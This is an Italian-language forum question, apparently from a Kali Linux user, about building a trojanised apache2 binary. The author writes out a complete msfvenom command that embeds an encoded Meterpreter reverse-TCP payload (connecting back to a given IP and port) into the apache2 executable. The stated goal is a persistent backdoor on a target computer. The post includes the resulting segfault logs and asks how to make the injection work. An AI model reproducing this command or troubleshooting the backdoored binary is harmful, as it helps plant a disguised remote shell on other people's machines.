Ho cercato di utilizzare msfvenom con il payload linux/x86/meterpreter/reverse_tcp
e un file binario apache2. Il mio intento è quello di creare una versione corrotta di apache2 per stabilire una backdoor persistente sul computer di destinazione. Di seguito è riportato il comando generale che ho provato
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.181.218 LPORT=4444 -f elf -e x86/shikata_ga_nai -x ./apache2 -o ./apache2_hacked
Quindi copio il binario apache2_hacked nella posizione corretta e cerco di avviarlo con service apache2 start
. Ciò provoca un errore di seg.
root@kali:~# service apache2 start
Job for apache2.service failed. See 'systemctl status apache2.service' and 'journalctl -xn' for details.
root@kali:~# systemctl status apache2.service
● apache2.service - LSB: Apache2 web server
Loaded: loaded (/etc/init.d/apache2)
Active: failed (Result: exit-code) since Fri 2015-09-18 15:49:24 EDT; 3min 37s ago
Process: 3446 ExecStart=/etc/init.d/apache2 start (code=exited, status=1/FAILURE)
Sep 18 15:49:24 kali apache2[3446]: Starting web server: apache2 failed!
Sep 18 15:49:24 kali apache2[3446]: The apache2 configtest failed. ... (warning).
Sep 18 15:49:24 kali apache2[3446]: Output of config test was:
Sep 18 15:49:24 kali apache2[3446]: Segmentation fault
Sep 18 15:49:24 kali apache2[3446]: Action 'configtest' failed.
Sep 18 15:49:24 kali apache2[3446]: The Apache error log may have more information.
Sep 18 15:49:24 kali systemd[1]: apache2.service: control process exited, code=exited status=1
Sep 18 15:49:24 kali systemd[1]: Failed to start LSB: Apache2 web server.
Sep 18 15:49:24 kali systemd[1]: Unit apache2.service entered failed state.
Sto usando lo strumento correttamente? Ci sono restrizioni sui template di cui devo essere a conoscenza? C'è qualcosa di speciale nel binario apache2 che impedisce tentativi di iniezione come questo?